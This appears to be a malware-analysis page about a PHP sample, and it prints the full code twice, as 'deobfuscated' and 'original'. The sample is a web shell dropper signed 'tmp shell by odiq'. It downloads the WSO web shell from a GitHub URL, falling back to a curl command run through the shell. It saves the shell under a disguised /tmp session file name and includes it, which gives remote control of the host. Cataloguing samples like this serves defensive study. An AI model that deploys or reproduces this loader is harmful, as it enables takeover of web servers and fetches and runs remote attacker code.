PHP Malware Analysis

Back to list

Tags

URLs
https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php

Deobfuscated code

<?php

#tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); }


Original code

<?php #tmp shell by odiq $URL = 'https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso.php'; #admin $TMP = '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'; function M() { $FGT = @file_get_contents($GLOBALS['URL']); if(!$FGT) { echo `curl -k $(echo {$GLOBALS['URL']}) > {$GLOBALS['TMP']}`; } else { $HANDLE = fopen($GLOBALS['TMP'], 'w'); fwrite($HANDLE, $FGT); fclose($HANDLE); } echo '<script>window.location="?work";</script>'; } if(file_exists($TMP)) { if(filesize($TMP) === 0) { unlink($TMP); M(); } else { include($TMP); } } else { M(); } ?>